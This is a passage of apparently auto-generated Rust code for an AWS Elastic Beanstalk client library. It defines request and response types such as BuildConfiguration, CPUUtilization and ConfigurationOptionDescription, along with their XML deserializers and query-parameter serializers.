DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] 
{ "MaxAgeRule" => { obj.max_age_rule = Some(try!(MaxAgeRuleDeserializer::deserialize("MaxAgeRule", stack))); } "MaxCountRule" => { obj.max_count_rule = Some(try!(MaxCountRuleDeserializer::deserialize("MaxCountRule", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } /// Serialize `ApplicationVersionLifecycleConfig` contents to a `SignedRequest`. struct ApplicationVersionLifecycleConfigSerializer; impl ApplicationVersionLifecycleConfigSerializer { fn serialize(params: &mut Params, name: &str, obj: &ApplicationVersionLifecycleConfig) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.max_age_rule { MaxAgeRuleSerializer::serialize( params, &format!("{}{}", prefix, "MaxAgeRule"), field_value, ); } if let Some(ref field_value) = obj.max_count_rule { MaxCountRuleSerializer::serialize( params, &format!("{}{}", prefix, "MaxCountRule"), field_value, ); } } } pub type ApplicationVersionProccess = bool; pub type ApplicationVersionStatus = String; struct ApplicationVersionStatusDeserializer; impl ApplicationVersionStatusDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ApplicationVersionStatus, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Request to execute a scheduled managed action immediately.</p>"] #[derive(Default,Debug,Clone)] pub struct ApplyEnvironmentManagedActionRequest { #[doc="<p>The action ID of the scheduled managed action to execute.</p>"] pub action_id: String, #[doc="<p>The environment ID of the target environment.</p>"] pub environment_id: Option<String>, #[doc="<p>The name of the target environment.</p>"] pub environment_name: Option<String>, } /// Serialize `ApplyEnvironmentManagedActionRequest` contents to a `SignedRequest`. 
struct ApplyEnvironmentManagedActionRequestSerializer; impl ApplyEnvironmentManagedActionRequestSerializer { fn serialize(params: &mut Params, name: &str, obj: &ApplyEnvironmentManagedActionRequest) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } params.put(&format!("{}{}", prefix, "ActionId"), &obj.action_id); if let Some(ref field_value) = obj.environment_id { params.put(&format!("{}{}", prefix, "EnvironmentId"), &field_value); } if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } } } #[doc="<p>The result message containing information about the managed action.</p>"] #[derive(Default,Debug,Clone)] pub struct ApplyEnvironmentManagedActionResult { #[doc="<p>A description of the managed action.</p>"] pub action_description: Option<String>, #[doc="<p>The action ID of the managed action.</p>"] pub action_id: Option<String>, #[doc="<p>The type of managed action.</p>"] pub action_type: Option<ActionType>, #[doc="<p>The status of the managed action.</p>"] pub status: Option<String>, } struct ApplyEnvironmentManagedActionResultDeserializer; impl ApplyEnvironmentManagedActionResultDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ApplyEnvironmentManagedActionResult, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ApplyEnvironmentManagedActionResult::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "ActionDescription" => { obj.action_description = Some(try!(StringDeserializer::deserialize("ActionDescription", stack))); } "ActionId" => { obj.action_id = Some(try!(StringDeserializer::deserialize("ActionId", stack))); } "ActionType" => { obj.action_type = Some(try!(ActionTypeDeserializer::deserialize("ActionType", stack))); } "Status" => { obj.status = Some(try!(StringDeserializer::deserialize("Status", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type AutoCreateApplication = bool; #[doc="<p>Describes an Auto Scaling launch configuration.</p>"] #[derive(Default,Debug,Clone)] pub struct AutoScalingGroup { #[doc="<p>The name of the <code>AutoScalingGroup</code> . </p>"] pub name: Option<ResourceId>, } struct AutoScalingGroupDeserializer; impl AutoScalingGroupDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<AutoScalingGroup, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = AutoScalingGroup::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] 
{ "Name" => { obj.name = Some(try!(ResourceIdDeserializer::deserialize("Name", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type AutoScalingGroupList = Vec<AutoScalingGroup>; struct AutoScalingGroupListDeserializer; impl AutoScalingGroupListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<AutoScalingGroupList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(AutoScalingGroupDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } pub type AvailableSolutionStackDetailsList = Vec<SolutionStackDescription>; struct AvailableSolutionStackDetailsListDeserializer; impl AvailableSolutionStackDetailsListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<AvailableSolutionStackDetailsList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(SolutionStackDescriptionDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } pub type AvailableSolutionStackNamesList = Vec<SolutionStackName>; struct AvailableSolutionStackNamesListDeserializer; impl AvailableSolutionStackNamesListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<AvailableSolutionStackNamesList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. 
})) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(SolutionStackNameDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } pub type BoxedBoolean = bool; struct BoxedBooleanDeserializer; impl BoxedBooleanDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<BoxedBoolean, XmlParseError> { try!(start_element(tag_name, stack)); let obj = bool::from_str(try!(characters(stack)).as_ref()).unwrap(); try!(end_element(tag_name, stack)); Ok(obj) } } pub type BoxedInt = i64; struct BoxedIntDeserializer; impl BoxedIntDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<BoxedInt, XmlParseError> { try!(start_element(tag_name, stack)); let obj = i64::from_str(try!(characters(stack)).as_ref()).unwrap(); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Settings for an AWS CodeBuild build.</p>"] #[derive(Default,Debug,Clone)] pub struct BuildConfiguration { #[doc="<p>The name of the artifact of the CodeBuild build. If provided, Elastic Beanstalk stores the build artifact in the S3 location <i>S3-bucket</i>/resources/<i>application-name</i>/codebuild/codebuild-<i>version-label</i>-<i>artifact-name</i>.zip. If not provided, Elastic Beanstalk stores the build artifact in the S3 location <i>S3-bucket</i>/resources/<i>application-name</i>/codebuild/codebuild-<i>version-label</i>.zip. </p>"] pub artifact_name: Option<String>, #[doc="<p>The Amazon Resource Name (ARN) of the AWS Identity and Access Management (IAM) role that enables AWS CodeBuild to interact with dependent AWS services on behalf of the AWS account.</p>"] pub code_build_service_role: NonEmptyString, #[doc="<p>Information about the compute resources the build project will use.</p> <ul> <li> <p> <code>BUILD_GENERAL1_SMALL: Use up to 3 GB memory and 2 vCPUs for builds</code> </p> </li> <li> <p> <code>BUILD_GENERAL1_MEDIUM: Use up to 7 GB memory and 4 vCPUs for builds</code> </p> </li> <li> <p> <code>BUILD_GENERAL1_LARGE: Use up to 15 GB memory and 8 vCPUs for builds</code> </p> </li> </ul>"] pub compute_type: Option<ComputeType>, #[doc="<p>The ID of the Docker image to use for this build project.</p>"] pub image: NonEmptyString, #[doc="<p>How long in minutes, from 5 to 480 (8 hours), for AWS CodeBuild to wait until timing out any related build that does not get marked as completed. The default is 60 minutes.</p>"] pub timeout_in_minutes: Option<BoxedInt>, } /// Serialize `BuildConfiguration` contents to a `SignedRequest`. 
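// The serializer below mixes required fields (CodeBuildServiceRole and Image,
// put unconditionally) with optional ones (guarded by `if let`). A hedged
// sketch, using a hypothetical "BuildConfig" prefix and placeholder ARN and
// image values:
//
//     let cfg = BuildConfiguration {
//         code_build_service_role: "arn:aws:iam::123456789012:role/codebuild-role".to_owned(),
//         image: "aws/codebuild/java:openjdk-8".to_owned(),
//         compute_type: Some("BUILD_GENERAL1_SMALL".to_owned()),
//         ..Default::default()
//     };
//     let mut params = Params::new();
//     BuildConfigurationSerializer::serialize(&mut params, "BuildConfig", &cfg);
//     // Yields BuildConfig.CodeBuildServiceRole=..., BuildConfig.Image=...,
//     // and BuildConfig.ComputeType=BUILD_GENERAL1_SMALL; ArtifactName and
//     // TimeoutInMinutes are skipped because they are None.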
struct BuildConfigurationSerializer; impl BuildConfigurationSerializer { fn serialize(params: &mut Params, name: &str, obj: &BuildConfiguration) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.artifact_name { params.put(&format!("{}{}", prefix, "ArtifactName"), &field_value); } params.put(&format!("{}{}", prefix, "CodeBuildServiceRole"), &obj.code_build_service_role); if let Some(ref field_value) = obj.compute_type { params.put(&format!("{}{}", prefix, "ComputeType"), &field_value); } params.put(&format!("{}{}", prefix, "Image"), &obj.image); if let Some(ref field_value) = obj.timeout_in_minutes { params.put(&format!("{}{}", prefix, "TimeoutInMinutes"), &field_value.to_string()); } } } #[doc="<p>CPU utilization metrics for an instance.</p>"] #[derive(Default,Debug,Clone)] pub struct CPUUtilization { #[doc="<p>Percentage of time that the CPU has spent in the <code>I/O Wait</code> state over the last 10 seconds.</p>"] pub io_wait: Option<NullableDouble>, #[doc="<p>Percentage of time that the CPU has spent in the <code>IRQ</code> state over the last 10 seconds.</p>"] pub irq: Option<NullableDouble>, #[doc="<p>Percentage of time that the CPU has spent in the <code>Idle</code> state over the last 10 seconds.</p>"] pub idle: Option<NullableDouble>, #[doc="<p>Percentage of time that the CPU has spent in the <code>Nice</code> state over the last 10 seconds.</p>"] pub nice: Option<NullableDouble>, #[doc="<p>Percentage of time that the CPU has spent in the <code>SoftIRQ</code> state over the last 10 seconds.</p>"] pub soft_irq: Option<NullableDouble>, #[doc="<p>Percentage of time that the CPU has spent in the <code>System</code> state over the last 10 seconds.</p>"] pub system: Option<NullableDouble>, #[doc="<p>Percentage of time that the CPU has spent in the <code>User</code> state over the last 10 seconds.</p>"] pub user: Option<NullableDouble>, } struct CPUUtilizationDeserializer; impl CPUUtilizationDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<CPUUtilization, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = CPUUtilization::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] 
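// The arms below match the service's literal XML tag names (IOWait, IRQ,
// SoftIRQ, and so on), whose capitalization differs from the snake_case Rust
// fields (io_wait, irq, soft_irq) they populate; this is why dispatch uses
// string literals rather than a derived naming convention.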
{ "IOWait" => { obj.io_wait = Some(try!(NullableDoubleDeserializer::deserialize("IOWait", stack))); } "IRQ" => { obj.irq = Some(try!(NullableDoubleDeserializer::deserialize("IRQ", stack))); } "Idle" => { obj.idle = Some(try!(NullableDoubleDeserializer::deserialize("Idle", stack))); } "Nice" => { obj.nice = Some(try!(NullableDoubleDeserializer::deserialize("Nice", stack))); } "SoftIRQ" => { obj.soft_irq = Some(try!(NullableDoubleDeserializer::deserialize("SoftIRQ", stack))); } "System" => { obj.system = Some(try!(NullableDoubleDeserializer::deserialize("System", stack))); } "User" => { obj.user = Some(try!(NullableDoubleDeserializer::deserialize("User", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type Cause = String; struct CauseDeserializer; impl CauseDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<Cause, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type Causes = Vec<Cause>; struct CausesDeserializer; impl CausesDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<Causes, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(CauseDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } #[doc="<p>Results message indicating whether a CNAME is available.</p>"] #[derive(Default,Debug,Clone)] pub struct CheckDNSAvailabilityMessage { #[doc="<p>The prefix used when this CNAME is reserved.</p>"] pub cname_prefix: DNSCnamePrefix, } /// Serialize `CheckDNSAvailabilityMessage` contents to a `SignedRequest`. 
struct CheckDNSAvailabilityMessageSerializer; impl CheckDNSAvailabilityMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &CheckDNSAvailabilityMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } params.put(&format!("{}{}", prefix, "CNAMEPrefix"), &obj.cname_prefix); } } #[doc="<p>Indicates if the specified CNAME is available.</p>"] #[derive(Default,Debug,Clone)] pub struct CheckDNSAvailabilityResultMessage { #[doc="<p>Indicates if the specified CNAME is available:</p> <ul> <li> <p> <code>true</code> : The CNAME is available.</p> </li> <li> <p> <code>false</code> : The CNAME is not available.</p> </li> </ul>"] pub available: Option<CnameAvailability>, #[doc="<p>The fully qualified CNAME to reserve when <a>CreateEnvironment</a> is called with the provided prefix.</p>"] pub fully_qualified_cname: Option<DNSCname>, } struct CheckDNSAvailabilityResultMessageDeserializer; impl CheckDNSAvailabilityResultMessageDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<CheckDNSAvailabilityResultMessage, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = CheckDNSAvailabilityResultMessage::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Available" => { obj.available = Some(try!(CnameAvailabilityDeserializer::deserialize("Available", stack))); } "FullyQualifiedCNAME" => { obj.fully_qualified_cname = Some(try!(DNSCnameDeserializer::deserialize("FullyQualifiedCNAME", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type CnameAvailability = bool; struct CnameAvailabilityDeserializer; impl CnameAvailabilityDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<CnameAvailability, XmlParseError> { try!(start_element(tag_name, stack)); let obj = bool::from_str(try!(characters(stack)).as_ref()).unwrap(); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Request to create or update a group of environments.</p>"] #[derive(Default,Debug,Clone)] pub struct ComposeEnvironmentsMessage { #[doc="<p>The name of the application to which the specified source bundles belong.</p>"] pub application_name: Option<ApplicationName>, #[doc="<p>The name of the group to which the target environments belong. Specify a group name only if the environment name defined in each target environment's manifest ends with a + (plus) character. See <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/environment-cfg-manifest.html\">Environment Manifest (env.yaml)</a> for details.</p>"] pub group_name: Option<GroupName>, #[doc="<p>A list of version labels, specifying one or more application source bundles that belong to the target application. Each source bundle must include an environment manifest that specifies the name of the environment and the name of the solution stack to use, and optionally can specify environment links to create.</p>"] pub version_labels: Option<VersionLabels>, } /// Serialize `ComposeEnvironmentsMessage` contents to a `SignedRequest`. 
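// The VersionLabels field is a list, so the serializer below delegates to
// `VersionLabelsSerializer` (defined elsewhere in this generated file), which
// presumably applies the same 1-based member indexing as every other list
// serializer here: version_labels of Some(vec!["v1".to_owned(),
// "v2".to_owned()]) would yield VersionLabels.member.1=v1 and
// VersionLabels.member.2=v2 alongside the scalar ApplicationName and
// GroupName parameters.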
struct ComposeEnvironmentsMessageSerializer; impl ComposeEnvironmentsMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &ComposeEnvironmentsMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.application_name { params.put(&format!("{}{}", prefix, "ApplicationName"), &field_value); } if let Some(ref field_value) = obj.group_name { params.put(&format!("{}{}", prefix, "GroupName"), &field_value); } if let Some(ref field_value) = obj.version_labels { VersionLabelsSerializer::serialize( params, &format!("{}{}", prefix, "VersionLabels"), field_value, ); } } } pub type ComputeType = String; pub type ConfigurationDeploymentStatus = String; struct ConfigurationDeploymentStatusDeserializer; impl ConfigurationDeploymentStatusDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationDeploymentStatus, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type ConfigurationOptionDefaultValue = String; struct ConfigurationOptionDefaultValueDeserializer; impl ConfigurationOptionDefaultValueDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationOptionDefaultValue, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Describes the possible values for a configuration option.</p>"] #[derive(Default,Debug,Clone)] pub struct ConfigurationOptionDescription { #[doc="<p>An indication of which action is required if the value for this configuration option changes:</p> <ul> <li> <p> <code>NoInterruption</code> : There is no interruption to the environment or application availability.</p> </li> <li> <p> <code>RestartEnvironment</code> : The environment is entirely restarted, all AWS resources are deleted and recreated, and the environment is unavailable during the process.</p> </li> <li> <p> <code>RestartApplicationServer</code> : The environment is available the entire time. However, a short application outage occurs when the application servers on the running Amazon EC2 instances are restarted.</p> </li> </ul>"] pub change_severity: Option<ConfigurationOptionSeverity>, #[doc="<p>The default value for this configuration option.</p>"] pub default_value: Option<ConfigurationOptionDefaultValue>, #[doc="<p>If specified, the configuration option must be a string value no longer than this value.</p>"] pub max_length: Option<OptionRestrictionMaxLength>, #[doc="<p>If specified, the configuration option must be a numeric value less than this value.</p>"] pub max_value: Option<OptionRestrictionMaxValue>, #[doc="<p>If specified, the configuration option must be a numeric value greater than this value.</p>"] pub min_value: Option<OptionRestrictionMinValue>, #[doc="<p>The name of the configuration option.</p>"] pub name: Option<ConfigurationOptionName>, #[doc="<p>A unique namespace identifying the option's associated AWS resource.</p>"] pub namespace: Option<OptionNamespace>, #[doc="<p>If specified, the configuration option must be a string value that satisfies this regular expression.</p>"] pub regex: Option<OptionRestrictionRegex>, #[doc="<p>An indication of whether the user defined this configuration option:</p> <ul> <li> <p> <code>true</code> : This configuration option was defined by the user. 
It is a valid choice for specifying this as an <code>Option to Remove</code> when updating configuration settings. </p> </li> <li> <p> <code>false</code> : This configuration was not defined by the user.</p> </li> </ul> <p> Constraint: You can remove only <code>UserDefined</code> options from a configuration. </p> <p> Valid Values: <code>true</code> | <code>false</code> </p>"] pub user_defined: Option<UserDefinedOption>, #[doc="<p>If specified, values for the configuration option are selected from this list.</p>"] pub value_options: Option<ConfigurationOptionPossibleValues>, #[doc="<p>An indication of which type of values this option has and whether it is allowable to select one or more than one of the possible values:</p> <ul> <li> <p> <code>Scalar</code> : Values for this option are a single selection from the possible values, or an unformatted string, or numeric value governed by the <code>MIN/MAX/Regex</code> constraints.</p> </li> <li> <p> <code>List</code> : Values for this option are multiple selections from the possible values.</p> </li> <li> <p> <code>Boolean</code> : Values for this option are either <code>true</code> or <code>false</code> .</p> </li> <li> <p> <code>Json</code> : Values for this option are a JSON representation of a <code>ConfigDocument</code>.</p> </li> </ul>"] pub value_type: Option<ConfigurationOptionValueType>, } struct ConfigurationOptionDescriptionDeserializer; impl ConfigurationOptionDescriptionDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationOptionDescription, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ConfigurationOptionDescription::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..]
{ "ChangeSeverity" => { obj.change_severity = Some(try!(ConfigurationOptionSeverityDeserializer::deserialize("ChangeSeverity", stack))); } "DefaultValue" => { obj.default_value = Some(try!(ConfigurationOptionDefaultValueDeserializer::deserialize("DefaultValue", stack))); } "MaxLength" => { obj.max_length = Some(try!(OptionRestrictionMaxLengthDeserializer::deserialize("MaxLength", stack))); } "MaxValue" => { obj.max_value = Some(try!(OptionRestrictionMaxValueDeserializer::deserialize("MaxValue", stack))); } "MinValue" => { obj.min_value = Some(try!(OptionRestrictionMinValueDeserializer::deserialize("MinValue", stack))); } "Name" => { obj.name = Some(try!(ConfigurationOptionNameDeserializer::deserialize("Name", stack))); } "Namespace" => { obj.namespace = Some(try!(OptionNamespaceDeserializer::deserialize("Namespace", stack))); } "Regex" => { obj.regex = Some(try!(OptionRestrictionRegexDeserializer::deserialize("Regex", stack))); } "UserDefined" => { obj.user_defined = Some(try!(UserDefinedOptionDeserializer::deserialize("UserDefined", stack))); } "ValueOptions" => { obj.value_options = Some(try!(ConfigurationOptionPossibleValuesDeserializer::deserialize("ValueOptions", stack))); } "ValueType" => { obj.value_type = Some(try!(ConfigurationOptionValueTypeDeserializer::deserialize("ValueType", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type ConfigurationOptionDescriptionsList = Vec<ConfigurationOptionDescription>; struct ConfigurationOptionDescriptionsListDeserializer; impl ConfigurationOptionDescriptionsListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationOptionDescriptionsList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. 
})) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(ConfigurationOptionDescriptionDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } pub type ConfigurationOptionName = String; struct ConfigurationOptionNameDeserializer; impl ConfigurationOptionNameDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationOptionName, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type ConfigurationOptionPossibleValue = String; struct ConfigurationOptionPossibleValueDeserializer; impl ConfigurationOptionPossibleValueDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationOptionPossibleValue, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type ConfigurationOptionPossibleValues = Vec<ConfigurationOptionPossibleValue>; struct ConfigurationOptionPossibleValuesDeserializer; impl ConfigurationOptionPossibleValuesDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationOptionPossibleValues, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(ConfigurationOptionPossibleValueDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } #[doc="<p> A specification identifying an individual configuration option along with its current value. For a list of possible option values, go to <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/command-options.html\">Option Values</a> in the <i>AWS Elastic Beanstalk Developer Guide</i>. </p>"] #[derive(Default,Debug,Clone)] pub struct ConfigurationOptionSetting { #[doc="<p>A unique namespace identifying the option's associated AWS resource.</p>"] pub namespace: Option<OptionNamespace>, #[doc="<p>The name of the configuration option.</p>"] pub option_name: Option<ConfigurationOptionName>, #[doc="<p>A unique resource name for a time-based scaling configuration option.</p>"] pub resource_name: Option<ResourceName>, #[doc="<p>The current value for the configuration option.</p>"] pub value: Option<ConfigurationOptionValue>, } struct ConfigurationOptionSettingDeserializer; impl ConfigurationOptionSettingDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationOptionSetting, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ConfigurationOptionSetting::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. 
})) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Namespace" => { obj.namespace = Some(try!(OptionNamespaceDeserializer::deserialize("Namespace", stack))); } "OptionName" => { obj.option_name = Some(try!(ConfigurationOptionNameDeserializer::deserialize("OptionName", stack))); } "ResourceName" => { obj.resource_name = Some(try!(ResourceNameDeserializer::deserialize("ResourceName", stack))); } "Value" => { obj.value = Some(try!(ConfigurationOptionValueDeserializer::deserialize("Value", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } /// Serialize `ConfigurationOptionSetting` contents to a `SignedRequest`. struct ConfigurationOptionSettingSerializer; impl ConfigurationOptionSettingSerializer { fn serialize(params: &mut Params, name: &str, obj: &ConfigurationOptionSetting) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.namespace { params.put(&format!("{}{}", prefix, "Namespace"), &field_value); } if let Some(ref field_value) = obj.option_name { params.put(&format!("{}{}", prefix, "OptionName"), &field_value); } if let Some(ref field_value) = obj.resource_name { params.put(&format!("{}{}", prefix, "ResourceName"), &field_value); } if let Some(ref field_value) = obj.value { params.put(&format!("{}{}", prefix, "Value"), &field_value); } } } pub type ConfigurationOptionSettingsList = Vec<ConfigurationOptionSetting>; struct ConfigurationOptionSettingsListDeserializer; impl 